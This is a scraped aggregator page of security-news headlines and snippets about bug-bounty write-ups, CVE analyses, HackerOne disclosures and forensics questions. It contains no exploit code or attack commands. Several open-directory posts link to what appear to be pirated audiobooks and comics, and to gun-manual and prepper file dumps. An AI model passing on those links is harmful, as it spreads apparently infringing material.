    How we Abused Repository Webhooks to Access Internal CI Systems at Scale
    submitted by /u/Hefty_Knowledge_7449 [link] [comments]
    Finding a RCE and a Docker escape in OneDev
    submitted by /u/monoimpact [link] [comments]
    Intent Summit 2022 - The Security Research Summit. For researchers. By researchers. CFP now open!
    submitted by /u/jat0369 [link] [comments]
    Exploiting a Seagate service to create a SYSTEM shell (CVE-2022-40286)
    submitted by /u/sanitybit [link] [comments]
    Practical Attacks against NTLMv1
    submitted by /u/0xdea [link] [comments]
    BGGP3 has completed! 34 entries, 23 writeups, and 3 CVE's.
    submitted by /u/netsecfriends [link] [comments]
  • Open

    OSINT: Gaining Knowledge From Instagram With Open Source Tools And How To Prevent It From Happening…
    Hey Everyone! So recently I’ve been receiving a lot of messages on my Instagram account. They’re asking me to visit a website in their bio… Continue reading on Medium »
  • Open

    Add products to any livestream.
    TikTok disclosed a bug submitted by datph4m: https://hackerone.com/reports/1654657 - Bounty: $3000
    Create product discounts of any shop
    TikTok disclosed a bug submitted by datph4m: https://hackerone.com/reports/1571578 - Bounty: $4500
    size_t-to-int vulnerability in exFAT leads to memory corruption via malformed USB flash drives
    PlayStation disclosed a bug submitted by theflow0: https://hackerone.com/reports/1340942 - Bounty: $10000
    DOS: out of memory from gif through upload api
    Mattermost disclosed a bug submitted by catenacyber: https://hackerone.com/reports/1620170 - Bounty: $150
  • Open

    AS-Roasting and Hashcat
    When running AS-Roasting, we get a session key encrypted with the user's password hash (please correct me if i wrong). Now, we question is how hashcat knows what guessed password hash is the right one ? Since it's only a random session key, how hashcat identify a valid output ? Thanks ! submitted by /u/theresilientturtle [link] [comments]
    Are APT groups using Posh C2 ? I could have sworn I read it multiple times but googling I cannot find anything. It’s possible I’m confusing it with PoshRat
    submitted by /u/HamburgersNHeroin [link] [comments]
    Rewards plus: Fake mobile banking rewards apps lure users to install info-stealing RAT on Android devices
    submitted by /u/SCI_Rusher [link] [comments]
    Attack Chain/Exploitation Path Diagram Generation Tools?
    We all know that there is no better satisfaction than utterly owning a myriad of hosts after combining several misconfigurations to achieve the goal (and more) of an assessment. It's just as good when getting that into the report for the client and running them through what happened. The problem is, or the problem we're having, is being able to pictorially demonstrate the paths we took throughout the chain of attack. We've taken a look at AttackForge but it's pretty certain that it'll be brushed away due to costs (even if it would be great to manage tests). Right now the team is screenshotting each step with some contextual explanation, which is fine, but ideally I would like us to be able to graphically represent what exactly happened from initial exploitation to reaching the goal of the assessment; rather than have only the screenshots, we could have the attack path graphics along with ATTCK as part of the Summary. Hope that makes sense, and curious if the community knows of any alternative tools? submitted by /u/SpaceLionBlues [link] [comments]
    Ransomware simulation tools
    Hello everyone, can you recommend me a free tool to simulate ransomware attacks? submitted by /u/Equivalent_Year154 [link] [comments]
  • Open

    Harry Potter 1-7 audio books read by Jim Dale (+ parent directory: LOTR 1, A Wrinkle in Time, A Series of Unfortunate Events, Narnia, Wizard of Oz, etc.)
    submitted by /u/NonGameCatharsis [link] [comments]
  • Open

    Arbitrum Saved From a Bug That Could Have Led to the Loss of $540M in Ethereum
    A white hat hacker discovered and disclosed a bug on Arbitrum’s latest upgrade that could have resulted in the loss of $530 million ETH. Continue reading on Medium »
    How I hacked an exam portal and got access to 10K+ users data including webcams
    Hello guys, I am Faique a security researcher and a bug bounty hunter and I welcome you to my write-up on a story of a hack that I did… Continue reading on InfoSec Write-ups »
    f2q1 — error code — over-the-range microwave
    If you’re encountering an f2q1 — error code — over-the-range microwave oven, don’t fret — we’ve got you covered on what this means and how… Continue reading on Medium »
    Easy way to Install waybackurls on Kali Linux.
    Fetch known URLs from the Wayback Machine for domains. Continue reading on Medium »
    What is a Security Operations Center (SOC)
    A security operations centre (SOC) — also known as an information security operations centre, or ISOC — is an in-house or outsourced team… Continue reading on Medium »
    Mass Assignment Leading to Pre Account Takeover
    API also called as Application Programmable Interface is used everywhere from modern automotive (smart), mobile, web and IOT devices etc… Continue reading on Medium »
  • Open

    Cellebrite Logical Image
    Can you create a logical image of a subset (like Encase) in PA? submitted by /u/hw60068n [link] [comments]
    how do I download Autopsy on Mac OS?
    I have a class in digital forensics and my professor required us to download Autopsy for class. I have a problem downloading it on my Mac OS, my professor made a big deal about not asking him how to download it bc he doesn't know. I used this article i found to download it through terminal and used it for one assignment then it crash and i don't know how to relaunch it again via terminal ​ this is the link i followed: https://www.arcpointforensics.com/news/installing-autopsy-on-macos-big-sur submitted by /u/gabbymichelle [link] [comments]
  • Open

    SecWiki News 2022-09-21 Review
    Cloud Native PostgreSQL攻击面分析 by ourren 2022羊城杯竞赛 Web题目解析 by ourren 终端入侵检测及防御规避之旅 by 风迷 我的三年红队生涯总结 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-09-21 Review
    Cloud Native PostgreSQL攻击面分析 by ourren 2022羊城杯竞赛 Web题目解析 by ourren 终端入侵检测及防御规避之旅 by 风迷 我的三年红队生涯总结 by ourren 更多最新文章,请访问SecWiki
  • Open

    CSRF vulnerability in NPM package csurf
    Article URL: https://snyk.io/blog/explaining-the-csurf-vulnerability-csrf-attacks-on-all-versions/ Comments URL: https://news.ycombinator.com/item?id=32926881 Points: 1 # Comments: 0
  • Open

    Subdomain Takeover
    🔍 Introduction Subdomain Takeover는 Subdomain에 매핑된 서버가 제거 또는 삭제됬을 떄 공격자가 해당 IP, 설정 등을 점유하여 인수할 수 있는 공격 방법입니다. 대표적으로 S3, Github Page, Heroku 등의 서비스를 사용할 때 자주 발생합니다. 예를들면 아래와 같습니다. takeme.target.com => target1144.github.io 위와 같이 takeme 도메인이 target1144의 Github page를 가리킴 target1144 계정이 삭제된 상태 현재 해당 도메인은 Github page의 소유주가 없기 때문에 404를 나타냄 이 때 공격자가 target1144란 이름의 계정을 새로 생성하여 Github page를 만들게 되면 takeme.target.com의 도메인을 사용할 수 있게 됩니다. 🗡 Offensive techniques Detect Subdomain 서비스에 접근했을 때 Response 내 노출된 데이터를 가지고 어떤 환경에서 구동되는지 추측해야합니다. 보통 연결된 서버가 없거나 계정이 삭제된 경우 각 서비스에서 특정한 메시지들을 보여주고 있고 이를 기반으로 쉽게 식별할 수 있습니다. 예를들어 Github page에서 매핑된 repository가 없는 경우 아래와 같은 메시지가 발생합니다. There isn't a GitHub Pages site here. 각 서비스에서 대한 정보들은 Can I take over XYZ에서 자세히 확인하실 수 있으며 Subdomain Enum 도구인 Amass, Subfinder, Findomain 등의 도구와 Takeover 체크 도구인 SubOver, Subjack 등의 도구를 조합하여 쉽게 식별할 수 있습니다. Find Subdomain Takeover with Amass + SubJack Exploitation 취약한 도메인을 찾았다면 연결된 서비스 등을 통해 해당 도메인을 인수하여 증명할 수 있습니다. 예를들어 S3 Bucket 이름으로 도메인이 매핑되어 있지만 S3 Bucket이 연결되어 있지 않다면 해당...
  • Open

    SharpImpersonation:一款基于令牌和Shellcode注入的用户模拟工具
    SharpImpersonation是一款功能强大的用户模拟工具,该工具基于令牌机制和Shellcode注入技术实现其功能。
    FreeBuf早报 | 两家中国电信公司被美列入威胁名单;游戏2K网站遭黑客攻击
    太平洋网络公司及其子公司 ComNet (USA) LLC 和中国联通 (美洲) 运营有限公司,列入被视为对国家安全构成威胁的通信设备和服务清单。
    信阳师范学院曝“学信网信息泄露”,学院:已报警,涉事学生干部被撤职
    9月19日,河南省信阳师范学院被曝“学信网信息泄露”,学校已经第一时间报案。
    全球十大国家级APT组织排行榜发布
    FreeBuf根据现在已经公开的信息,从杀伤力、活跃度两个维度,遴选出全球前十大国家级APT组织排行榜。
    为儿童隐私实施“最高标准”!加州通过《互联网隐私立法》
    新的法律将对美国儿童实施一些最严格的隐私要求,尤其是在社交媒体方面。
    黑客从Wintermute加密货币做市商处窃取1.62亿美元
    Wintermute 首席执行官Evgeny Gaevoy宣布DeFi相关业务遭到黑客攻击,损失了约 1.622 亿美元。
  • Open

    Domain Shadowing: A Stealthy Use of DNS Compromise for Cybercrime
    Domain shadowing is a special case of DNS hijacking where attackers stealthily create malicious subdomains under compromised domain names. The post Domain Shadowing: A Stealthy Use of DNS Compromise for Cybercrime appeared first on Unit 42.
  • Open

    Write-up: File path traversal, validation of file extension with null byte bypass @ PortSwigger…
    This write-up for the lab File path traversal, validation of file extension with null byte bypass is part of my walkthrough series for… Continue reading on InfoSec Write-ups »
    Vulnerable Flask App
    No content preview
  • Open

    Write-up: File path traversal, validation of file extension with null byte bypass @ PortSwigger…
    This write-up for the lab File path traversal, validation of file extension with null byte bypass is part of my walkthrough series for… Continue reading on InfoSec Write-ups »
    Vulnerable Flask App
    No content preview
  • Open

    Write-up: File path traversal, validation of file extension with null byte bypass @ PortSwigger…
    This write-up for the lab File path traversal, validation of file extension with null byte bypass is part of my walkthrough series for… Continue reading on InfoSec Write-ups »
    Vulnerable Flask App
    No content preview
  • Open

    浅谈被动式 IAST 产品与技术实现
    作者:iiusky@墨云科技VLab Team 原文链接:https://mp.weixin.qq.com/s/6olAInQLPDaDAO3Up1rQvQ 笔者曾参与RASP研究与研发得到一些相关经验,近两年观察到IAST发展势头明显,但目前国内外对于IAST具体实现的细节相关文章较少,且笔者看到的开源IAST仅有洞态,故想通过笔者视角,对IAST的原理及技术实现进行探究及分享。 本文仅...
  • Open

    浅谈被动式 IAST 产品与技术实现
    作者:iiusky@墨云科技VLab Team 原文链接:https://mp.weixin.qq.com/s/6olAInQLPDaDAO3Up1rQvQ 笔者曾参与RASP研究与研发得到一些相关经验,近两年观察到IAST发展势头明显,但目前国内外对于IAST具体实现的细节相关文章较少,且笔者看到的开源IAST仅有洞态,故想通过笔者视角,对IAST的原理及技术实现进行探究及分享。 本文仅...
  • Open

    Am I going insane? Why isn't a return address saved on the stack here?
    ​ https://preview.redd.it/pbjdes26i4p91.png?width=1762&format=png&auto=webp&s=c178b19fd003cde06f77028dd9c2f8a81f5b36ec submitted by /u/FinanceAggravating12 [link] [comments]
  • Open

    Fuzzing Hardware Like Software
    Article URL: https://arxiv.org/abs/2102.02308 Comments URL: https://news.ycombinator.com/item?id=32919571 Points: 1 # Comments: 0
  • Open

    One takeover to rule them all
    Because of Covid, the first quarantaine in France occured in March 2020. During that time I wrote a Python script to detect Subdomain Takeover. As I have been successful several times with the tool, one hit was especially beautiful. The story of how I have been able to take control of 450+ subdomains of the national french electricity company EDF. I'm not going to explain what is subdomain takeover so take a look at the following articles if you want to know more: OWASP test guide

  • Open

    Finding the Sliver Lining (Sliver Walkthrough)
    Shameless self-promotion here, but I did a walkthrough of the Sliver adversary emulation framework and showed some ways to detect the beacons. I saw some other people post it to Reddit, so I thought I would just submit it myself. https://youtu.be/izMMmOaLn9g submitted by /u/Infosecsamurai [link] [comments]
    Leverage Autorun programs - Win PrivEsc
    submitted by /u/Clement_Tino [link] [comments]
    Crack WPA2-PSK from Probing Clients
    submitted by /u/tbhaxor [link] [comments]
  • Open

    REX (XRX) Bug Bounty Program
    The rex.io project invites everyone to take part in the REX Bug Bounty program, to find bugs in the REX Smart Contracts. Continue reading on Medium »
    SynFutures Goes Mobile on Testnet, Launches Bug Bounty Campaign
    The SynFutures team is excited to announce the mobile version of our decentralized derivatives trading platform is now available on… Continue reading on SynFutures »
    Web Reconnaissance For Bug Bounty
    I know you’ll love this blog guys and this time to talk about information gathering for our targets in bug bounty, I have tools, tips so… Continue reading on Medium »
    Project Degis Testnet Task and Tutorial
    During the testnet, participants will act as underwriters or buyers to experience the whole workflow. Testnet will also simulate all… Continue reading on Medium »
    Privilege Escalation Leads to making authenticated actions (payment processing, creating invoices..
    Introduction Continue reading on Medium »
    Problem installing Nuclei
    I recently had to reinstall Nuclei from scratch on a testing machine. Continue reading on Bug Bounty »
    Unsubscribe any user’s e-mail notifications via IDOR
    Description: I would like to share how I was able to unsubscribe any user from the Target website’s email notification service. Insecure… Continue reading on Medium »
    Bypassing CSRF Protection (I)
    Hi, My name is Hashar Mujahid and in this blog, we will talk about some techniques to bypass the csrf protection. Continue reading on InfoSec Write-ups »
  • Open

    ResponderCon Followup
    I had the opportunity to speak at the recent ResponderCon, put on by Brian Carrier of BasisTech. I'll start out by saying that I really enjoyed attending an in-person event after 2 1/2 yrs of virtual events, and that Brian's idea to do something a bit different (different from OSDFCon) worked out really well. I know that there've been other ransomware-specific events, but I've not been able to attend them. As soon as the agenda kicked off, it seemed as though the first four presentations had been coordinated...but they hadn't. It simply worked out that way. Brian referenced what he thought my content would be throughout his presentation, I referred back to Brian's content, Allan referred to content from the earlier presentations, and Dennis's presentation fit right in as if it were a seaml…
    Deconstructing Florian's Bicycle
    Not long ago, Florian Roth shared some fascinating thoughts via his post, The Bicycle of the Forensic Analyst, in which he discusses increases in efficiency in the forensic review process. I say "review" here, because "analysis" is a term that is often used incorrectly, but that's for another time. Specifically, Florian's post discusses efficiency in the forensic review process during incident response. After reading Florian's article, I had some thoughts that I wanted share to that would extend what he's referring to, in part because I've seen, and continue to see the need for something just like what is discussed. I've shared my own thoughts on this topic previously. My initial foray into digital forensics was not terribly different from Florian's, as he describes in his article. For me,…
  • Open

    TryHackMe: OhSINT Walkthrough
    What information can you possibly get with just one photo? Link: OhSINT Continue reading on Medium »
    OSINT AND TOP 15 OPEN-SOURCE INTELLIGENCE TOOLS
    OSINT is an acronym for open-source intelligence and forms one of the key concepts in building a robust cybersecurity system. OSINT is the… Continue reading on InfoSec Write-ups »
  • Open

    Oracle Cloud vulnerability allows unauthorized access to customer cloud storage volumes
    submitted by /u/sagitz_ [link] [comments]
    Cool Attack -- Bypassing NAT and Firewalls to Shut Down PDUs
    submitted by /u/derp6996 [link] [comments]
    Open Source Tool to Collect Volatile Data for Incident Response
    submitted by /u/0x636f6f6c [link] [comments]
  • Open

    IDOR on Tagged People
    TikTok disclosed a bug submitted by apapedulimu: https://hackerone.com/reports/1555376 - Bounty: $3000
    Use-after-free in setsockopt IPV6_2292PKTOPTIONS (CVE-2020-7457)
    PlayStation disclosed a bug submitted by theflow0: https://hackerone.com/reports/1441103 - Bounty: $10000
    CORS Misconfiguration on vanillaforums.com
    Vanilla disclosed a bug submitted by admin0x00: https://hackerone.com/reports/1527555 - Bounty: $150
  • Open

    Oracle Cloud vulnerability allowed users to access disks of other customers
    Article URL: https://twitter.com/shirtamari/status/1572223325719646211 Comments URL: https://news.ycombinator.com/item?id=32917973 Points: 2 # Comments: 1
    OCI vulnerability allows unauthorized access to customer cloud storage volumes
    Article URL: https://www.wiz.io/blog/attachme-oracle-cloud-vulnerability-allows-unauthorized-cross-tenant-volume-access Comments URL: https://news.ycombinator.com/item?id=32913221 Points: 20 # Comments: 2
  • Open

    A Guide to Virtual Patching for Website Vulnerabilities
    All software has bugs — but some bugs can lead to serious security vulnerabilities that can impact your website and traffic. Vulnerabilities can be especially dangerous when your software is running over the web, since anyone can reach out and try to attack it. That’s why keeping your website up-to-date with the latest patches and security updates is so important. The reality is there is no shortage of websites running outdated WordPress, Joomla, or Magento software. Continue reading A Guide to Virtual Patching for Website Vulnerabilities at Sucuri Blog.
  • Open

    How I Hacked my College’s student portal
    No content preview
    Bypassing CSRF Protection (I)
    No content preview
    OSINT AND TOP 15 OPEN-SOURCE INTELLIGENCE TOOLS
    No content preview
    30 Search Engines for Cybersecurity Researchers (Part 3 of 3)
    No content preview
    Abusing Broken Link In Fitbit (Google Acquisition)To Collect BugBounty Reports On Behalf Of Google !
    No content preview
    Cross-site request forgery (CSRF) Explained and Exploited I
    No content preview
    Phishing and its effect on healthcare sector
    No content preview
    Domain-based Message Authentication Reporting and Conformance (DMARC) and its importance for…
    No content preview
    Key Web 3.0 Security Issues That Need to be Settled
    No content preview
    How to get Cloud Security Experience without a job
    Get that coveted experience before you land a cloud security job Continue reading on InfoSec Write-ups »
  • Open

    How I Hacked my College’s student portal
    No content preview
    Bypassing CSRF Protection (I)
    No content preview
    OSINT AND TOP 15 OPEN-SOURCE INTELLIGENCE TOOLS
    No content preview
    30 Search Engines for Cybersecurity Researchers (Part 3 of 3)
    No content preview
    Abusing Broken Link In Fitbit (Google Acquisition)To Collect BugBounty Reports On Behalf Of Google !
    No content preview
    Cross-site request forgery (CSRF) Explained and Exploited I
    No content preview
    Phishing and its effect on healthcare sector
    No content preview
    Domain-based Message Authentication Reporting and Conformance (DMARC) and its importance for…
    No content preview
    Key Web 3.0 Security Issues That Need to be Settled
    No content preview
    How to get Cloud Security Experience without a job
    Get that coveted experience before you land a cloud security job Continue reading on InfoSec Write-ups »
  • Open

    How I Hacked my College’s student portal
    No content preview
    Bypassing CSRF Protection (I)
    No content preview
    OSINT AND TOP 15 OPEN-SOURCE INTELLIGENCE TOOLS
    No content preview
    30 Search Engines for Cybersecurity Researchers (Part 3 of 3)
    No content preview
    Abusing Broken Link In Fitbit (Google Acquisition)To Collect BugBounty Reports On Behalf Of Google !
    No content preview
    Cross-site request forgery (CSRF) Explained and Exploited I
    No content preview
    Phishing and its effect on healthcare sector
    No content preview
    Domain-based Message Authentication Reporting and Conformance (DMARC) and its importance for…
    No content preview
    Key Web 3.0 Security Issues That Need to be Settled
    No content preview
    How to get Cloud Security Experience without a job
    Get that coveted experience before you land a cloud security job Continue reading on InfoSec Write-ups »
  • Open

    19 Dune audiobooks (unabridged)
    submitted by /u/NonGameCatharsis [link] [comments]
  • Open

    SecWiki News 2022-09-20 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-09-20 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    varc - Open Source tool for Volatile Artifact Collection
    submitted by /u/0x636f6f6c [link] [comments]
    Gaming Console Forensic Tools and Processes
    How do you handle gaming consoles such as the Playstation, X-Box, Nintendo Switch, or others during forensic investigations? Are there any tools that you can recommend? How do you acquire the data on those devices and how do you process it? I'm particularly interested in any best practices as well as getting the communication artifacts and usage data. Can you recommend any resources such as books, blog posts, research articles, or courses on this topic? submitted by /u/F-2016 [link] [comments]
  • Open

    攻防红队日记:利用路由器创建PPTP搭建隧道进内网
    攻防演练中网络设备的权限得分比网站权限的高,就是因为拿到网络设备比较容易进内网。就像本次案例,利用路由器创建PPTP搭建虚拟专用网络进内网,可以说拿下网络设备的权限就等于进内网成功了一半。
    FreeBuf早报 | 优步深陷数据泄露泥潭;印度尼西亚通过《数据隐私法》
    优步披露了与上周发生的安全事件有关的更多细节,将攻击归咎于一个它认为与臭名昭著的 LAPSUS$ 黑客组织有关联的威胁行为者。
    Rockstar Games遭黑客攻击,《侠盗猎车手6》90个开发视频外泄
    热门游戏《侠盗猎车手6》(Grand Theft Auto)开发片段遭到黑客大规模窃取,这一泄露事件立即在游戏圈迅速传播。
    无间道! "沙虫 "组织冒充乌克兰电信公司投放恶意软件
    黑客组织Sandworm(沙虫) 伪装成电信提供商,以恶意软件攻击乌克兰实体。
    继北京健康宝后,澳门健康码又遭境外势力攻击
    重视培养网络安全技术人才,加大投入研发网络前沿技术,建设网络安全强国不会仅仅成为一句“口号”。
    这些观点掷地有声!FreeBuf网安智库说第四季圆满落幕
    本文将带你回顾本季内容精华,更有专家金句海报~
    议题征集 | CIS 2022网络安全创新大会·多维时空,金秋启航
    11月16日,大家期待已久的第八届网络安全创新大会将在上海举办。
    等保2.0看这一篇就够了
    网络安全等级保护是指对国家重要信息、法人和其他组织及公民的专有信息以及信息和存储、传输、处理这些信息的信息系统分等级实行安全保护。
    攻击者正冒充美国政府机构骗取承包商Office账户
    针对美国政府承包商的持续性网络钓鱼攻击正呈逐渐扩大之势,攻击者正采用更加难以分辨的“诱饵”制作钓鱼文件。
    攻击技术研判 | 近期频发钓鱼新手法:伪造弹出登录窗口进行钓鱼攻击
    本文将就事件中出现的BITB技术进行分析与探究。
    实战某高校的一次挖矿病毒的应急处置
    一次加班引发的挖矿病毒的应急处置
  • Open

    I Wanna Go Fast, Really Fast, like (Kerberos) FAST
    1    Introduction At TrustedSec, we weigh an information security program’s ability to defend against a single specified attack by measuring detection, deflection, and deterrence. Now while a majority of my blog posts have been concentrated around detection this post is more ‘deterrence’ focused. I first heard about Kerberos FAST from Steve Syfuhs (@SteveSyfuhs) of Microsoft... The post I Wanna Go Fast, Really Fast, like (Kerberos) FAST appeared first on TrustedSec.
  • Open

    Parameters in Lambda Functions that lead to XSS and Injection
    ACM.56 How I might abuse your Lambda function on a pentest if you don’t properly secure your inputs Continue reading on Cloud Security »
  • Open

    404星链计划 | 新收录3个安全团队的开源工具!速看!
    关于星链计划 「404星链计划」是知道创宇404实验室于2020年8月提出的开源项目收集计划,这个计划的初衷是将404实验室内部一些工具通过开源的方式发挥其更大的价值,也就是“404星链计划1.0”,这里面有为大家熟知的Pocsuite3、ksubdomain等等,很快我们就收到了许多不错的反馈。2020年11月,我们将目光投向了整个安全圈,以星链计划成员为核心,筛选优质、有意义、有趣、坚持...
    CVE-2021-34866 Linux 内核提权漏洞分析
    作者:b1cc@墨云科技VLab Team 原文链接:https://mp.weixin.qq.com/s/w0HYPpdMxhcPvKvtSJf_CQ 2021年10月12日,日本安全厂商 Flatt security 披露了 Linux 内核提权漏洞CVE-2021-34866。11月5日,@HexRabbit 在 Github 上公布了此漏洞的利用方式,并写文分析,技术高超,行文简洁。...
  • Open

    404星链计划 | 新收录3个安全团队的开源工具!速看!
    关于星链计划 「404星链计划」是知道创宇404实验室于2020年8月提出的开源项目收集计划,这个计划的初衷是将404实验室内部一些工具通过开源的方式发挥其更大的价值,也就是“404星链计划1.0”,这里面有为大家熟知的Pocsuite3、ksubdomain等等,很快我们就收到了许多不错的反馈。2020年11月,我们将目光投向了整个安全圈,以星链计划成员为核心,筛选优质、有意义、有趣、坚持...
    CVE-2021-34866 Linux 内核提权漏洞分析
    作者:b1cc@墨云科技VLab Team 原文链接:https://mp.weixin.qq.com/s/w0HYPpdMxhcPvKvtSJf_CQ 2021年10月12日,日本安全厂商 Flatt security 披露了 Linux 内核提权漏洞CVE-2021-34866。11月5日,@HexRabbit 在 Github 上公布了此漏洞的利用方式,并写文分析,技术高超,行文简洁。...

  • Open

    Gauing for instant bounties.[Conclusion]
    So in the previous part, I explained how to Gau, to score instant bounties. Continue reading on Medium »
    THE BUG OFTEN IGNORED: BLIND XSS
    INTRODUCTION Continue reading on Medium »
    Découverte d’une faille IDOR et extraction de données téléphoniques
    J’ai un compte client fidélité chez une grande enseigne de prêt à porter… je tiens à flouter le nom de l’enseigne dans la suite de cet… Continue reading on Medium »
    How I found the Stored XSS and Clickjacking.
    Hello everyone! I’m Nitish, this is my first write-up. Hope you all are doing great. Continue reading on Medium »
    Cookie Parameter to XSS [Bounty Writeups -2]
    XSS is Dead!!! NaN…You don't get it. Continue reading on Medium »
    All about: Path/Directory Traversal
    In this section, we’ll explain what directory traversal is, describe how to carry out path traversal attacks and circumvent common… Continue reading on Medium »
  • Open

    GCFE Lab Questions
    Hello! I'm going to be taking the GCFE exam in a couple of weeks and started freaking out cause I read there will be lab questions where you have to spin up a VM, is that true? I've heard SANS/GIAC wanting to add hands-on questions to their exams. Anyone who recently took this exam can confirm? Are the lab questions part of the total 115 questions or is that an addition section? TYIA submitted by /u/Comprehensive-Camp56 [link] [comments]
    Career in digital forensics
    Hey all - just querying what a career is like in digital forensics? Is it worthwhile and rewarding? Good work/life balance? Career Progression and longevity? I have an opportunity for an entry level DF job for a law enforcement organisation. Relatively good pay, although I’m unsure about the rest at this stage. Any tips recommended. Thank you. submitted by /u/OkGrape5530 [link] [comments]
    Need advice on career path
    I am a college student currently thinking about a career in digital forensics. I like taking things apart and analyzing them. I am the guy in the family calls to help and sit there for hours looking things up tell I find the problem. But my main thing that interest me is impactful work that helps people. I want to go down the LE route but no idea how to get qualified. Currently majoring in computer forensics for my associates then after that transfer into a 4 year and major in something computer science related. But until then should I be applying for internships? Am I taking the right major and what requirement’s should I be pursuing certifications?. I need some guidance so any information is much appreciated. submitted by /u/Fireman_XXR [link] [comments]
    Database Forensic tools
    Hello, I am currently taking a Computer Forensics class at my school and I have been tasked with researching Database Forensics and its associated tools. I am having some issues determining what tools there are and would like to request some help. If I could just be pointed in the right direction that would be great. ​ Any links provided would be a blessing. Thank you to anyone that can help. submitted by /u/Driagis [link] [comments]
  • Open

    STDiO2022 : 1 — Dark Web Investigation (OSINT)
    SPOILER ALERT : Hello I’m scriptpit01 !! This is a writeup for the STDiO2022 “1 — Dark Web Investigation” which will end up in showing the… Continue reading on Medium »
  • Open

    Announcing the Launch of the Chrome Root Program
    In 2020, we announced we were in the early phases of establishing the Chrome Root Program and launching the Chrome Root Store.  The Chrome Root Program ultimately determines which website certificates are trusted by default in Chrome, and enables more consistent and reliable website certificate validation across platforms.  This post shares an update on our progress and how these changes help us better protect Chrome’s users. What’s a root store or root program, anyway? Chrome uses digital certificates (often referred to as “certificates,” “HTTPS certificates,” or “server authentication certificates”) to ensure the connections it makes on behalf of its users are secure and private. Certificates are responsible for binding a domain name to a public key, which Chrome uses to encrypt dat…
  • Open

    I'm Building a Self-Destructing USB Drive Part 2
    submitted by /u/Machinehum [link] [comments]
    Vulnerabilities Identified in EZVIZ Smart Cams
    submitted by /u/Turbulent-Ant-6813 [link] [comments]
    When Athletic Abilities Just Aren't Enough - Scoreboard Hacking Part 1
    submitted by /u/mdulin2 [link] [comments]
  • Open

    SecWiki News 2022-09-19 Review
    JavaScript审计 by 蓝色淡风 在OAuth流程中所产生的账户劫持漏洞研究 by 蓝色淡风 SecWiki周刊(第446期) by ourren 0到1搭建企业级数据治理体系 by ourren BlackHat USA 2022 议题慢递 by Avenger 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-09-19 Review
    JavaScript审计 by 蓝色淡风 在OAuth流程中所产生的账户劫持漏洞研究 by 蓝色淡风 SecWiki周刊(第446期) by ourren 0到1搭建企业级数据治理体系 by ourren BlackHat USA 2022 议题慢递 by Avenger 更多最新文章,请访问SecWiki
  • Open

    Comics (Not sure if NSFW)
    https://booksdl.org/comics0/ https://booksdl.org/comics1/ submitted by /u/Appropriate-You-6065 [link] [comments]
    Gun manuals and pictures
    General gun pictures https://www.sturmgewehr.com/bhinton/ https://www.sturmgewehr.com/dalbert/ http://tirito.com.ar/Venta/ Gun manuals and catalogs http://www.louiscandell.com/pdf/ (Unrelated but on same site) Audio files http://www.louiscandell.com/audio/ Lyrics http://www.louiscandell.com/lyrics/ ​ UZI open directory (nsfw uzigirls folder) http://www.uzitalk.com/reference/ submitted by /u/c-rn [link] [comments]
    Survival / Prepper books
    https://shtfinfo.com/shtffiles/alternative_energy/ https://shtfinfo.com/shtffiles/animals/ https://shtfinfo.com/shtffiles/books_and_reading/ https://shtfinfo.com/shtffiles/bov/ https://shtfinfo.com/shtffiles/canning/ https://shtfinfo.com/shtffiles/clothing/ https://shtfinfo.com/shtffiles/comm/ https://shtfinfo.com/shtffiles/construction/ https://shtfinfo.com/shtffiles/defense/ https://shtfinfo.com/shtffiles/food/ https://shtfinfo.com/shtffiles/gardening/ https://shtfinfo.com/shtffiles/good_info/ https://shtfinfo.com/shtffiles/gun_manuals/ https://shtfinfo.com/shtffiles/health_hygiene/ https://shtfinfo.com/shtffiles/historic_documents/ https://shtfinfo.com/shtffiles/how_to/ https://shtfinfo.com/shtffiles/hunting_trapping/ https://shtfinfo.com/shtffiles/list_bob_cache/ https://shtfinfo.com/shtffiles/manuals/ https://shtfinfo.com/shtffiles/maps_navigation/ https://shtfinfo.com/shtffiles/medical_remedies/ https://shtfinfo.com/shtffiles/nuclear_chemical/ https://shtfinfo.com/shtffiles/prepare/ https://shtfinfo.com/shtffiles/recipes/ https://shtfinfo.com/shtffiles/scouting// https://shtfinfo.com/shtffiles/shelter/ https://shtfinfo.com/shtffiles/social/ https://shtfinfo.com/shtffiles/survival/ https://shtfinfo.com/shtffiles/tables_conversions/ https://shtfinfo.com/shtffiles/tactical/ https://shtfinfo.com/shtffiles/targets/ https://shtfinfo.com/shtffiles/training/ https://shtfinfo.com/shtffiles/water/ submitted by /u/c-rn [link] [comments]
    French remote-control vehicle magazines
    http://www.rc-paper.com/scansHD/ submitted by /u/c-rn [link] [comments]
    Shortwave radio manuals
    http://www.manuals.cornpone.net/ submitted by /u/c-rn [link] [comments]
  • Open

    JIT-Picking: Differential Fuzzing of JavaScript Engines
    Article URL: https://publications.cispa.saarland/3773/ Comments URL: https://news.ycombinator.com/item?id=32899668 Points: 2 # Comments: 0
  • Open

    ‍Hacking Smart Contracts, Android Vulnerability, RCE, Prototype Poisoning, Anti-Human Server…
    No content preview
    How I abused the file upload function to get a high severity vulnerability in Bug Bounty
    No content preview
    The terrifying world of Cross-Site Scripting (XSS) (Part 2) — StackZero
    No content preview
    Living Off The Land: Suspicious System32
    The services below are some of the most commonly abused services for malicious parties to “live of the land”. Each are built into Windows… Continue reading on InfoSec Write-ups »
    30 Search Engines for Cybersecurity Researchers (Part 2 of 3)
    No content preview
    30 Search Engines for Cybersecurity Researchers (Part 1 of 3)
    No content preview
    Write-up: JWT authentication bypass via weak signing key @ PortSwigger Academy
    No content preview
    How I Found My FIRST Vulnerability/Bug Bounty and How You Can Too: Part 2
    Simple hacks! Continue reading on InfoSec Write-ups »
    How I Found My FIRST Vulnerability/Bug Bounty and How You Can Too: Part 1
    How to start ethically hacking websites Continue reading on InfoSec Write-ups »
    Cool Recon techniques every hacker misses! Episode 2
    No content preview
  • Open

    ‍Hacking Smart Contracts, Android Vulnerability, RCE, Prototype Poisoning, Anti-Human Server…
    No content preview
    How I abused the file upload function to get a high severity vulnerability in Bug Bounty
    No content preview
    The terrifying world of Cross-Site Scripting (XSS) (Part 2) — StackZero
    No content preview
    Living Off The Land: Suspicious System32
    The services below are some of the most commonly abused services for malicious parties to “live of the land”. Each are built into Windows… Continue reading on InfoSec Write-ups »
    30 Search Engines for Cybersecurity Researchers (Part 2 of 3)
    No content preview
